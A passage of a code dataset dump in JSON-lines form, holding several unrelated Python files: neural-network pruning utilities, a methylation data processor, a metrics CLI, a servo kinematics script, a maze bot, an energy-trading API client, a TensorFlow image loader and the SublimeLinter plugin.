count_params(model):\n total = 0\n for param in model.parameters():\n flat = param.view(param.size(0), -1)\n flat = flat.data.cpu().numpy()\n total = total + np.count_nonzero(flat)\n return total\n\nimport numpy as np\n\ndef calculate_threshold(weights, ratio):\n return np.percentile(np.array(torch.abs(weights).cpu().numpy()), ratio)\n\n\ndef sparsify(model, sparsity_level=50.):\n for name, param in model.named_parameters():\n if 'weight' in name:\n threshold = calculate_threshold(param.data, sparsity_level)\n mask = torch.gt(torch.abs(param.data), threshold).float()\n\n param.data = param.data * mask\n return model\n\ndef argwhere_nonzero(layer, batchnorm=False):\n indices=[]\n # for batchnorms we want to do the opposite\n if batchnorm:\n for idx,w in enumerate(layer):\n if torch.sum(torch.abs(w)).data.cpu().numpy() == 0.:\n indices.append(idx)\n else:\n for idx,w in enumerate(layer):\n if torch.sum(torch.abs(w)).data.cpu().numpy() != 0.:\n indices.append(idx)\n\n return indices\n\n\ndef prune_conv(indices, layer, follow=False):\n # follow tells us whether we need to prune input channels or output channels\n a,b,c,d = layer.weight.data.cpu().numpy().shape\n\n if not follow:\n # prune output channels\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[indices])\n if layer.bias:\n layer.bias.data = torch.from_numpy(layer.bias.data.cpu().numpy()[indices])\n else:\n # prune input channels - so don't touch biases because we're not changing the number of neurons/nodes/output channels\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[:,indices])\n\ndef prune_fc(indices, channel_size, layer, follow_conv=True):\n a,b = layer.weight.data.cpu().numpy().shape\n if follow_conv:\n # if we are following a conv layer we need to expand each index by the size of the plane\n indices = [item for sublist in list((map(lambda i : np.arange((i * channel_size), (i*channel_size+channel_size)), indices))) for item in sublist]\n\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[:,indices])\n\ndef prune_bn(indices, layer):\n layer.weight.data = torch.from_numpy(layer.weight.data.cpu().numpy()[indices])\n layer.bias.data = torch.from_numpy(layer.bias.data.cpu().numpy()[indices])\n\n layer.running_mean = torch.from_numpy(layer.running_mean.cpu().numpy()[indices])\n layer.running_var = torch.from_numpy(layer.running_var.cpu().numpy()[indices])\n\ndef compress_convs(model, compressed):\n\n ls = expand_model(model, [])\n\n channels = []\n nonzeros = []\n skip_connection = []\n\n for l1, l2 in zip(ls, ls[1:]):\n if isinstance(l1, nn.Conv2d):\n\n nonzeros = argwhere_nonzero(l1.weight)\n nonzeros_altered = True\n\n channels.append(len(nonzeros))\n channel_size = l1.kernel_size[0] * l1.kernel_size[1]\n prune_conv(nonzeros, l1)\n\n if isinstance(l2, nn.Conv2d):\n prune_conv(nonzeros, l2, follow=True)\n elif isinstance(l2, nn.Linear):\n prune_fc(nonzeros, channel_size, l2, follow_conv=True)\n elif isinstance(l2, nn.Sequential):\n # save for skip connection\n skip_connection = nonzeros\n\n elif isinstance(l1, nn.BatchNorm2d):\n # no need to append to channels since we will already have done it\n # i.e. num of channels in bn is same as num of channels in last conv layer\n\n assert nonzeros_altered, \"batch norm layer appeared before a convolutional layer\"\n\n l1_channels = l1.num_features\n\n prune_bn(nonzeros, l1)\n\n if isinstance(l2, nn.Conv2d):\n if (l2.in_channels < l1_channels) and (len(skip_connection) > 0): # if this is a skip connection:\n prune_conv(skip_connection, l2, follow=True)\n elif l1_channels == l2.in_channels:\n prune_conv(nonzeros, l2, follow=True)\n elif isinstance(l2, nn.Linear):\n prune_fc(nonzeros, channel_size, l2, follow_conv=True) # TODO fix this please\n\n print(channels)\n\n new_model = compressed(channels)\n\n for original, compressed in zip(expand_model(model, []), expand_model(new_model, [])):\n print(\"original: \", original)\n print(\"compressed: \", compressed)\n print(\"===============\\n\\n\\n\")\n\n if not isinstance(original, nn.Sequential):\n compressed.weight.data = original.weight.data\n if original.bias is not None:\n compressed.bias.data = original.bias.data\n\n return new_model\n\ndef expand_model(model, layers=[]):\n for layer in model.children():\n if len(list(layer.children())) > 0:\n expand_model(layer, layers)\n else:\n layers.append(layer)\n return layers\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"354778461","text":"import pandas as pd\nfrom tqdm import tqdm\n\nfrom .utils import create_path\n\n\nclass DataProcessor:\n def __init__(self, manifest_type):\n self.manifest_type = manifest_type\n self.island_annotations = None\n self.raw_mynorm = None\n self.cg_per_chr = None\n self.mynorm_std = None\n self.manifest = None\n self.mynorm = None\n\n def set_manifest(self) -> None:\n if self.manifest_type == \"E\":\n self.manifest = pd.read_csv(\"resources/EPIC/EPIC.csv\", index_col=0, low_memory=False)\n else:\n self.manifest = pd.read_csv(\"resources/450K/450K.csv\", index_col=0, low_memory=False)\n\n @staticmethod\n def first_load(mynorm_path: str) -> dict:\n df = pd.read_csv(mynorm_path, nrows=5)\n\n dtypes = df.dtypes\n col_names = dtypes.index\n types = [i.name for i in dtypes.values]\n column_types = dict(zip(col_names, types))\n\n return column_types\n\n def load_mynorm(self, mynorm_path: str, column_types: dict) -> None:\n self.raw_mynorm = pd.read_csv(mynorm_path, index_col=0, encoding=\"latin1\", dtype=column_types)\n self.mynorm = self.raw_mynorm.mean(axis=1).to_frame(name=\"beta-values\")\n self.mynorm_std = self.raw_mynorm.std(axis=1).to_frame(name=\"beta-values std\")\n\n def select_cpg(self) -> None:\n mynorm_cpg = set(self.mynorm.index)\n overlapped = set.intersection(mynorm_cpg, set(self.manifest.index))\n self.manifest = self.manifest.loc[overlapped, :]\n\n def split_per_chromosome(self) -> None:\n \"\"\"Function return list of dfs with CpGs and MAPINFO per chromosome\"\"\"\n cpg_per_chr = []\n\n for chr_ in tqdm(self.manifest[\"CHR\"].unique()):\n cgs = self.manifest[self.manifest[\"CHR\"] == chr_][\"MAPINFO\"].astype(int)\n cpg_per_chr.append(cgs)\n\n self.cpg_per_chr = cpg_per_chr\n\n @staticmethod\n def export_to_csv(df: pd.DataFrame, path) -> None:\n path = create_path(path, name=\"CpG_in_island.csv\")\n df.to_csv(path)\n\n @staticmethod\n def annotate(df: pd.DataFrame, annotations: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Function to annotate base CpG and nearby CpG\"\"\"\n conseq_cpg_annotations = annotations.loc[df.index, :]\n conseq_cpg_annotations = conseq_cpg_annotations.add_prefix('Nearby CpG: ')\n df = pd.concat((df, conseq_cpg_annotations), axis=1, sort=False)\n\n df = df.reset_index()\n df = df.set_index(\"Base CpG\")\n\n base_cpg_annotations = annotations.loc[df.index, :]\n base_cpg_annotations = base_cpg_annotations.add_prefix('Base CpG: ', )\n df = pd.concat((df, base_cpg_annotations), axis=1, sort=False)\n\n df = df.sort_values(by=[\"Base CpG: CHR\", \"Base CpG: MAPINFO\"])\n return df\n","sub_path":"source/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439204316","text":"# -*- coding:utf-8 -*-\nimport argparse\nimport urllib.request\nimport json\n\n\nclass DwNode:\n def __init__(self, hostname):\n self.hostname = hostname\n\n def __str__(self):\n return \"%s\\n\".format(self.hostname)\n\n def get_metrics_url(self):\n return \"\".join([self.hostname, \":\", \"8081\", \"/\", \"metrics\"])\n\n\nclass Metrics:\n def __init__(self, gauges, counters, histograms, meters, timers):\n self.gauges = gauges\n self.counters = counters\n self.histograms = histograms\n self.meters = meters\n self.timers = timers\n\n\ndef parse_cmd_args():\n \"\"\"\n Form some positional arguments and optional ones\n Parse them and form prerequisite objects\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Show various outputs in real time from metrics server\")\n # only required argument\n parser.add_argument(\"hostname\", help=\"Hostname of the metrics server\")\n\n # below are all optional\n parser.add_argument(\"--version\",\n action=\"store_true\",\n help=\"show version of metrics library\")\n parser.add_argument(\"--gauges\",\n action=\"store_true\",\n help=\"show gauges data from metrics\")\n parser.add_argument(\"--counters\",\n action=\"store_true\",\n help=\"show counters data from metrics\")\n parser.add_argument(\"--histograms\",\n action=\"store_true\",\n help=\"show metrics histograms\")\n parser.add_argument(\"--meters\",\n action=\"store_true\",\n help=\"show meters from metrics\")\n parser.add_argument(\"--timers\",\n action=\"store_true\",\n help=\"show timers info from metrics\")\n\n global args\n args = parser.parse_args()\n\n global node\n node = DwNode(args.hostname)\n\n\ndef get_metrics():\n \"\"\"\n Just make the actual request and parse json\n :return:\n \"\"\"\n global node\n metrics_url = node.get_metrics_url()\n with urllib.request.urlopen(metrics_url) as request:\n response_json = request.read()\n response_dict = json.loads(response_json.decode())\n global metrics\n metrics = Metrics(gauges=response_dict[\"gauges\"],\n timers=response_dict[\"timers\"],\n counters=response_dict[\"counters\"],\n histograms=response_dict[\"histograms\"],\n meters=response_dict[\"meters\"])\n\n\ndef print_gauges():\n for key in metrics.gauges:\n print(key, metrics.gauges[key][\"value\"], sep=\" => \")\n\n\ndef print_timers():\n for timer in metrics.timers:\n print(timer)\n print(\"=\" * 50)\n for key in metrics.timers[timer]:\n print(key, metrics.timers[timer][key], sep=\" => \")\n\n\ndef print_counters():\n for counter in metrics.counters:\n print(counter, metrics.counters[counter][\"count\"], sep=\" => \")\n\n\ndef print_histograms():\n pass\n\n\ndef print_meters():\n for meter in metrics.meters:\n print(meter)\n print(\"=\" * 50)\n for meter_type in metrics.meters[meter]:\n print(meter_type, metrics.meters[meter][meter_type], sep=\" => \")\n print(\"\\n\")\n\n\ndef pretty_print():\n if args.gauges:\n print_gauges()\n if args.timers:\n print_timers()\n if args.counters:\n print_counters()\n if args.histograms:\n pass\n if args.meters:\n print_meters()\n\n\nif __name__ == \"__main__\":\n parse_cmd_args()\n get_metrics()\n pretty_print()","sub_path":"dwtop.py","file_name":"dwtop.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"287145007","text":"'''\nCreated on 27 Apr 2018\n\n@author: shashwatjain\n'''\nfrom __future__ import division\nimport time\nfrom InvKin import arm_IK\nimport math\n\n# Import the PCA9685 module.\nimport Adafruit_PCA9685\n\n\n# Uncomment to enable debug output.\n#import logging\n#logging.basicConfig(level=logging.DEBUG)\n\n# Initialise the PCA9685 using the default address (0x40).\npwm = Adafruit_PCA9685.PCA9685()\n\n# Alternatively specify a different address and/or bus:\n#pwm = Adafruit_PCA9685.PCA9685(address=0x41, busnum=2)\n\n# Configure min and max servo pulse lengths\nservo_min = 150 # Min pulse length out of 4096\nservo_max = 600 # Max pulse length out of 4096\n\n# Helper function to make setting a servo pulse width simpler.\ndef set_servo_pulse(channel, pulse):\n pulse_length = 1000000 # 1,000,000 us per second\n pulse_length //= 60 # 60 Hz\n print('{0}us per period'.format(pulse_length))\n pulse_length //= 4096 # 12 bits of resolution\n print('{0}us per bit'.format(pulse_length))\n pulse *= 1000\n pulse //= pulse_length\n pwm.set_pwm(channel, 0, pulse)\n# \n# # Set frequency to 60hz, good for servos.\npwm.set_pwm_freq(60)\n\n\nif __name__ == '__main__':\n print(\"Enter the coordinates in X,Y,Z format\")\n X = input(\"Enter X--> \")\n Y = input(\"Enter Y--> \")\n Z = input(\"Enter Z--> \")\n theta1, theta2, theta3, alpha2, beta2, alpha3 = arm_IK(X, Y, Z)\n range = servo_max - servo_min\n step = range/180\n pwm.set_pwm(0, 0, step*math.degrees(theta1))\n print(math.degrees(theta1))\n print(math.degrees(theta2))\n print(math.degrees(theta3))\n# print('Moving servo on channel 0, press Ctrl-C to quit...')\n# while True:\n# # Move servo on channel O between extremes.\n# pwm.set_pwm(0, 0, servo_min)\n# time.sleep(1)\n# pwm.set_pwm(0, 0, servo_max)\n# time.sleep(1)\n","sub_path":"examples/MoveUsingIK1.py","file_name":"MoveUsingIK1.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"483359505","text":"# Code by Bernardo Subercaseaux\n# bernardosubercaseaux@gmail.com\n# 31/03/2017\n\n# You can use global variable to save information for your next move call\nstate = {\"my_points\":0, \"your_points\":0, \"number_of_points\":0, \"inf\":1000000000}\nimport random\n\n\n \ndef get_dists(start, graph):\n global state\n states = {}\n length = graph.n\n \n if \"nodes\" in state:\n nodes = state[\"nodes\"]\n else:\n nodes = []\n for i in range(length):\n for j in range(length):\n nodes.append((i,j))\n state[\"nodes\"] = nodes\n \n dist = {}\n dist[start] = 0\n q = [start]\n visited = {}\n\n while len(q):\n u = q.pop(0)\n \n for neigh in graph.neighbours(u):\n if neigh not in visited:\n dist[neigh] = dist[u] + 1\n q.append(neigh)\n \n visited[u] = 1\n \n \n states[\"dist\"] = dist\n return states\n\ndef next_move(graph, points, my_path, enemy_path):\n global state\n \n next_ = graph.neighbours(my_path[-1])[0]\n \n states = get_dists(my_path[-1],graph)\n dist = states[\"dist\"]\n min_dist = 10000000000000\n nearest_d = 10000000000000\n nearest = list(points)[0]\n \n \n for point in points:\n if dist[point] < nearest_d:\n nearest_d = dist[point]\n nearest = point\n \n \n for pos in graph.neighbours(my_path[-1]):\n d = get_dists(pos, graph)\n dd = d[\"dist\"]\n if dd[nearest] < min_dist:\n min_dist = dd[nearest]\n next_ = pos\n \n return next_\n \n # graph: an object representing the maze\n # graph.n : size of the maze\n # call graph.neighbours((i, j)) to get possible moves from a position (i, j)\n # points: list of positions of remaining points to collect\n # my_path: list of positions you have been to until now (my_path[-1] is your current position)\n # enemy_path: list of positions your enemy have been to until now.\n\n # return your next move. Should be one of graph.neighbours(my_path[-1])\n","sub_path":"graphes_march.py","file_name":"graphes_march.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"61876279","text":"# Based on the problem, but the opposite solution\nfin = open('shuffle_challenge.in', 'r')\nn = int(fin.readline())\nswap = list(map(int, fin.readline().split()))\ncows = list(map(int, fin.readline().split()))\n\n# Solution\noutput = []\nfor i in range(3):\n temp = list('0'*n)\n for j in range(len(cows)):\n for x in range(len(swap)):\n temp[x] = cows[swap[x]-1]\n cows = temp\n output = temp\n\nprint(output)\n\n\nwith open('shuffle_challenge.out', 'w') as out:\n for i in range(len(output)):\n print(output[i], file=out)\n","sub_path":"USACO Problems/Bronze/2017/Dec/Problem 2/Challenge/bovine_shuffle_2.py","file_name":"bovine_shuffle_2.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181941064","text":"import os\nimport requests\nimport json\nimport logging\nimport uuid\nfrom functools import wraps\n\n\nclass AreaNotFoundException(Exception):\n pass\n\n\nclass RestWebsocketAPIException(Exception):\n pass\n\n\nclass RestCommunicationMixin:\n\n @property\n def _url_prefix(self):\n return f'{self.domain_name}/external-connection/api/{self.simulation_id}/{self.device_id}'\n\n def _post_request(self, endpoint_suffix, data):\n endpoint = f\"{self._url_prefix}/{endpoint_suffix}/\"\n data[\"transaction_id\"] = str(uuid.uuid4())\n return data[\"transaction_id\"], post_request(endpoint, data, self.jwt_token)\n\n def _get_request(self, endpoint_suffix, data):\n endpoint = f\"{self._url_prefix}/{endpoint_suffix}/\"\n data[\"transaction_id\"] = str(uuid.uuid4())\n return data[\"transaction_id\"], get_request(endpoint, data, self.jwt_token)\n\n\ndef retrieve_jwt_key_from_server(domain_name):\n resp = requests.post(\n f\"{domain_name}/api-token-auth/\",\n data=json.dumps({\"username\": os.environ[\"API_CLIENT_USERNAME\"],\n \"password\": os.environ[\"API_CLIENT_PASSWORD\"]}),\n headers={\"Content-Type\": \"application/json\"})\n if resp.status_code != 200:\n logging.error(f\"Request for token authentication failed with status code {resp.status_code}.\"\n f\"Response body: {resp.text}\")\n return\n return json.loads(resp.text)[\"token\"]\n\n\ndef post_request(endpoint, data, jwt_token):\n resp = requests.post(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n if resp.status_code != 200:\n logging.error(f\"Request to {endpoint} failed with status code {resp.status_code}.\"\n f\"Response body: {resp.text} {resp.reason}\")\n return False\n return True\n\n\ndef blocking_post_request(endpoint, data, jwt_token):\n data[\"transaction_id\"] = str(uuid.uuid4())\n response = requests.post(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n return json.loads(response.json())\n\n\ndef get_request(endpoint, data, jwt_token):\n resp = requests.get(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n if resp.status_code != 200:\n logging.error(f\"Request to {endpoint} failed with status code {resp.status_code}.\"\n f\"Response body: {resp.text}\")\n return False\n return True\n\n\ndef get_aggregator_prefix(domain_name, simulation_id):\n return f\"{domain_name}/external-connection/aggregator-api/{simulation_id}/\"\n\n\ndef blocking_get_request(endpoint, data, jwt_token):\n data[\"transaction_id\"] = str(uuid.uuid4())\n response = requests.get(\n endpoint,\n data=json.dumps(data),\n headers={\"Content-Type\": \"application/json\",\n \"Authorization\": f\"JWT {jwt_token}\"})\n return json.loads(response.json())\n\n\ndef get_area_uuid_from_area_name(serialized_scenario, area_name):\n if \"name\" in serialized_scenario and serialized_scenario[\"name\"] == area_name:\n return serialized_scenario[\"uuid\"]\n if \"children\" in serialized_scenario:\n for child in serialized_scenario[\"children\"]:\n area_uuid = get_area_uuid_from_area_name(child, area_name)\n if area_uuid is not None:\n return area_uuid\n return None\n\n\ndef get_area_uuid_from_area_name_and_collaboration_id(collab_id, area_name, domain_name):\n jwt_key = retrieve_jwt_key_from_server(domain_name)\n from sgqlc.endpoint.http import HTTPEndpoint\n\n url = f\"{domain_name}/graphql/\"\n headers = {'Authorization': f'JWT {jwt_key}', 'Content-Type': 'application/json'}\n\n query = 'query { readConfiguration(uuid: \"{' + collab_id + \\\n '}\") { scenarioData { representation { serialized } } } }'\n\n endpoint = HTTPEndpoint(url, headers)\n data = endpoint(query=query)\n area_uuid = get_area_uuid_from_area_name(\n json.loads(data[\"data\"][\"readConfiguration\"][\"scenarioData\"][\"representation\"][\"serialized\"]), area_name\n )\n if not area_uuid:\n raise AreaNotFoundException(f\"Area with name {area_name} is not part of the \"\n f\"collaboration with UUID {collab_id}\")\n return area_uuid\n\n\ndef logging_decorator(command_name):\n def decorator(f):\n @wraps(f)\n def wrapped(self, *args, **kwargs):\n logging.debug(f'Sending command {command_name} to device.')\n return_value = f(self, *args, **kwargs)\n logging.debug(f'Command {command_name} responded with: {return_value}.')\n return return_value\n return wrapped\n return decorator\n","sub_path":"d3a_api_client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"11941484","text":"# Loads an image with the tensorflow input pipeline\nimport glob\nimport os\nimport tensorflow as tf\nimport hypergan.inputs.resize_image_patch\nfrom tensorflow.python.ops import array_ops\nfrom natsort import natsorted, ns\nfrom hypergan.gan_component import ValidationException, GANComponent\n\nclass ImageLoader:\n \"\"\"\n ImageLoader loads a set of images into a tensorflow input pipeline.\n \"\"\"\n\n def __init__(self, batch_size):\n self.batch_size = batch_size\n\n def create(self, directory, channels=3, format='jpg', width=64, height=64, crop=False, resize=False, sequential=False):\n directories = glob.glob(directory+\"/*\")\n directories = [d for d in directories if os.path.isdir(d)]\n\n if(len(directories) == 0):\n directories = [directory] \n\n # Create a queue that produces the filenames to read.\n if(len(directories) == 1):\n # No subdirectories, use all the images in the passed in path\n filenames = glob.glob(directory+\"/*.\"+format)\n else:\n filenames = glob.glob(directory+\"/**/*.\"+format)\n\n filenames = natsorted(filenames)\n\n print(\"[loader] ImageLoader found\", len(filenames))\n self.file_count = len(filenames)\n if self.file_count == 0:\n raise ValidationException(\"No images found in '\" + directory + \"'\")\n filenames = tf.convert_to_tensor(filenames, dtype=tf.string)\n\n def parse_function(filename):\n image_string = tf.read_file(filename)\n if format == 'jpg':\n image = tf.image.decode_jpeg(image_string, channels=channels)\n elif format == 'png':\n image = tf.image.decode_png(image_string, channels=channels)\n else:\n print(\"[loader] Failed to load format\", format)\n image = tf.cast(image, tf.float32)\n # Image processing for evaluation.\n # Crop the central [height, width] of the image.\n if crop:\n image = hypergan.inputs.resize_image_patch.resize_image_with_crop_or_pad(image, height, width, dynamic_shape=True)\n elif resize:\n image = tf.image.resize_images(image, [height, width], 1)\n\n image = image / 127.5 - 1.\n tf.Tensor.set_shape(image, [height,width,channels])\n\n return image\n\n # Generate a batch of images and labels by building up a queue of examples.\n dataset = tf.data.Dataset.from_tensor_slices(filenames)\n if not sequential:\n print(\"Shuffling data\")\n dataset = dataset.shuffle(self.file_count)\n dataset = dataset.map(parse_function, num_parallel_calls=4)\n dataset = dataset.batch(self.batch_size, drop_remainder=True)\n dataset = dataset.repeat()\n dataset = dataset.prefetch(1)\n\n self.dataset = dataset\n\n self.iterator = self.dataset.make_one_shot_iterator()\n self.x = tf.reshape( self.iterator.get_next(), [self.batch_size, height, width, channels])\n\n def inputs(self):\n return [self.x,self.x]\n","sub_path":"hypergan/inputs/image_loader.py","file_name":"image_loader.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"645948710","text":"#\n# sublimelinter.py\n# Part of SublimeLinter3, a code checking framework for Sublime Text 3\n#\n# Written by Ryan Hileman and Aparajita Fishman\n#\n# Project: https://github.com/SublimeLinter/SublimeLinter3\n# License: MIT\n#\n\nimport os\nimport re\n\nimport sublime\nimport sublime_plugin\n\nfrom .lint.linter import Linter\nfrom .lint.highlight import HighlightSet\nfrom .lint import persist, util, watcher\n\n\n# In ST3, this is the entry point for a plugin\ndef plugin_loaded():\n persist.plugin_is_loaded = True\n persist.load_settings()\n\n util.generate_menus()\n util.generate_color_scheme(from_reload=False)\n util.install_languages()\n\n watch_gutter_themes()\n persist.on_settings_updated_call(SublimeLinter.on_settings_updated)\n\n\ndef watch_gutter_themes():\n w = watcher.PathWatcher()\n gutter_themes = []\n gutter_directories = (\n (persist.PLUGIN_DIRECTORY, 'gutter-themes'),\n ('User', '{}-gutter-themes'.format(persist.PLUGIN_NAME))\n )\n\n for d in gutter_directories:\n path = os.path.join(sublime.packages_path(), os.path.join(*d))\n\n try:\n if not os.path.isdir(path):\n os.makedirs(path)\n\n gutter_themes.append(path)\n except OSError:\n pass\n\n w.watch(gutter_themes, util.generate_menus)\n w.start()\n\n\nclass SublimeLinter(sublime_plugin.EventListener):\n \"\"\"The main ST3 plugin class.\"\"\"\n\n # We use this to match linter settings filenames.\n LINTER_SETTINGS_RE = re.compile('^SublimeLinter(-.+?)?\\.sublime-settings')\n\n shared_instance = None\n\n @classmethod\n def shared_plugin(cls):\n return cls.shared_instance\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Keeps track of which views we have assigned linters to\n self.loaded_views = set()\n\n # Keeps track of which views have actually been linted\n self.linted_views = set()\n\n # A mapping between view ids and syntax names\n self.view_syntax = {}\n\n # Every time a view is modified, this is updated and an asynchronous lint is queued.\n # When a lint is done, if the view has been modified since the lint was initiated,\n # marks are not updated because their positions may no longer be valid.\n self.last_hit_times = {}\n\n self.__class__.shared_instance = self\n persist.queue.start(self.lint)\n\n # This gives us a chance to lint the active view on fresh install\n window = sublime.active_window()\n\n if window:\n self.on_activated(window.active_view())\n\n @classmethod\n def lint_all_views(cls):\n def apply(view):\n if view.id() in persist.linters:\n cls.shared_instance.hit(view)\n\n util.apply_to_all_views(apply)\n\n def lint(self, view_id, hit_time=None, callback=None):\n callback = callback or self.highlight\n view = Linter.get_view(view_id)\n\n if view is None:\n return\n\n # Build a list of regions that match the linter's selectors\n sections = {}\n\n for sel, _ in Linter.get_selectors(view_id):\n sections[sel] = []\n\n for region in view.find_by_selector(sel):\n sections[sel].append((view.rowcol(region.a)[0], region.a, region.b))\n\n filename = view.file_name()\n code = Linter.text(view)\n Linter.lint_view(view_id, filename, code, sections, hit_time, callback)\n\n def highlight(self, view, linters, hit_time):\n \"\"\"Highlight any errors found during a lint.\"\"\"\n errors = {}\n vid = view.id()\n highlights = persist.highlights[vid] = HighlightSet()\n\n for linter in linters:\n if linter.highlight:\n highlights.add(linter.highlight)\n\n if linter.errors:\n for line, errs in linter.errors.items():\n errors.setdefault(line, []).extend(errs)\n\n # If the view has been modified since the lint was triggered,\n # don't draw marks.\n if hit_time is not None and self.last_hit_times.get(vid, 0) > hit_time:\n return\n\n highlights.clear(view)\n highlights.draw(view)\n persist.errors[vid] = errors\n\n # Update the status\n self.on_selection_modified_async(view)\n\n def hit(self, view):\n \"\"\"Record an activity that could trigger a lint and enqueue a desire to lint.\"\"\"\n vid = view.id()\n self.check_syntax(view)\n self.linted_views.add(vid)\n\n if view.size() == 0:\n for linter in Linter.get_linters(vid):\n linter.clear()\n\n return\n\n self.last_hit_times[vid] = persist.queue.hit(view)\n\n def check_syntax(self, view):\n \"\"\"\n Checks if the view's syntax has changed. If so, a new linter is assigned.\n Returns whether the syntax has changed.\n \"\"\"\n vid = view.id()\n syntax = persist.syntax(view)\n\n # Syntax either has never been set or just changed\n if not vid in self.view_syntax or self.view_syntax[vid] != syntax:\n self.view_syntax[vid] = syntax\n Linter.assign(view, reassign=True)\n self.clear(view)\n return True\n else:\n return False\n\n def clear(self, view):\n Linter.clear_view(view)\n\n # sublime_plugin.EventListener event handlers\n\n def on_modified(self, view):\n \"\"\"Called when a view is modified.\"\"\"\n if view.id() not in persist.linters:\n syntax_changed = self.check_syntax(view)\n\n if not syntax_changed:\n return\n else:\n syntax_changed = False\n\n if syntax_changed or persist.settings.get('lint_mode') == 'background':\n self.hit(view)\n else:\n self.clear(view)\n\n def on_load(self, view):\n \"\"\"Called when a file is finished loading.\"\"\"\n self.on_new(view)\n\n def on_activated(self, view):\n \"\"\"Called when a view gains input focus.\"\"\"\n\n # Reload the plugin settings.\n persist.load_settings()\n\n self.check_syntax(view)\n view_id = view.id()\n\n if not view_id in self.linted_views:\n if not view_id in self.loaded_views:\n self.on_new(view)\n\n if persist.settings.get('lint_mode') in ('background', 'load/save'):\n self.hit(view)\n\n self.on_selection_modified_async(view)\n\n def on_open_settings(self, view):\n \"\"\"\n Called when any settings file is opened.\n view is the view that contains the text of the settings file.\n \"\"\"\n if self.is_settings_file(view, user_only=True):\n persist.update_user_settings(view=view)\n\n def is_settings_file(self, view, user_only=False):\n filename = view.file_name()\n\n if not filename:\n return False\n\n dirname, filename = os.path.split(filename)\n dirname = os.path.basename(dirname)\n\n if self.LINTER_SETTINGS_RE.match(filename):\n if user_only:\n return dirname == 'User'\n else:\n return dirname in (persist.PLUGIN_DIRECTORY, 'User')\n\n @classmethod\n def on_settings_updated(cls, relint=False):\n \"\"\"Callback triggered when the settings are updated.\"\"\"\n if relint:\n cls.lint_all_views()\n else:\n Linter.redraw_all()\n\n def on_new(self, view):\n \"\"\"Called when a new buffer is created.\"\"\"\n self.on_open_settings(view)\n vid = view.id()\n self.loaded_views.add(vid)\n self.view_syntax[vid] = persist.syntax(view)\n Linter.assign(view)\n\n def on_selection_modified_async(self, view):\n \"\"\"Called when the selection changes (cursor moves or text selected).\"\"\"\n vid = view.id()\n\n # Get the line number of the first line of the first selection.\n try:\n lineno = view.rowcol(view.sel()[0].begin())[0]\n except IndexError:\n lineno = -1\n\n if vid in persist.errors:\n errors = persist.errors[vid]\n\n if errors:\n lines = sorted(list(errors))\n counts = [len(errors[line]) for line in lines]\n count = sum(counts)\n plural = 's' if count > 1 else ''\n\n if lineno in errors:\n # Sort the errors by column\n line_errors = sorted(errors[lineno], key=lambda error: error[0])\n line_errors = [error[1] for error in line_errors]\n\n if plural:\n # Sum the errors before the first error on this line\n index = lines.index(lineno)\n first = sum(counts[0:index]) + 1\n\n if len(line_errors) > 1:\n last = first + len(line_errors) - 1\n status = '{}-{} of {} errors: '.format(first, last, count)\n else:\n status = '{} of {} errors: '.format(first, count)\n else:\n status = 'Error: '\n\n status += '; '.join(line_errors)\n else:\n status = '%i error%s' % (count, plural)\n\n view.set_status('sublimelinter', status)\n else:\n view.erase_status('sublimelinter')\n\n def on_pre_save(self, view):\n # If a settings file is the active view and is saved,\n # copy the current settings first so we can compare post-save.\n if view.window().active_view() == view and self.is_settings_file(view):\n persist.copy_settings()\n\n def on_post_save(self, view):\n # First check to see if the project settings changed\n if view.window().project_file_name() == view.file_name():\n self.lint_all_views()\n else:\n # Now see if a .sublimelinterrc has changed\n if os.path.basename(view.file_name()) == '.sublimelinterrc':\n # If it's the main .sublimelinterrc, reload the settings\n rc_path = os.path.join(os.path.dirname(__file__), '.sublimelinterrc')\n\n if view.file_name() == rc_path:\n persist.load_settings(force=True)\n else:\n self.lint_all_views()\n else:\n syntax_changed = self.check_syntax(view)\n vid = view.id()\n mode = persist.settings.get('lint_mode')\n show_errors = persist.settings.get('show_errors_on_save')\n\n if syntax_changed:\n self.clear(view)\n\n if vid in persist.linters:\n if mode != 'manual':\n self.lint(vid)\n else:\n show_errors = False\n else:\n show_errors = False\n else:\n if show_errors or mode in ('load/save', 'save only'):\n self.lint(vid)\n elif mode == 'manual':\n show_errors = False\n\n if show_errors:\n view.run_command('sublimelinter_show_all_errors')\n\n def on_close(self, view):\n vid = view.id()\n\n if vid in self.loaded_views:\n self.loaded_views.remove(vid)\n\n if vid in self.linted_views:\n self.linted_views.remove(vid)\n\n if vid in self.view_syntax:\n del self.view_syntax[vid]\n\n if vid in self.last_hit_times:\n del self.last_hit_times[vid]\n\n 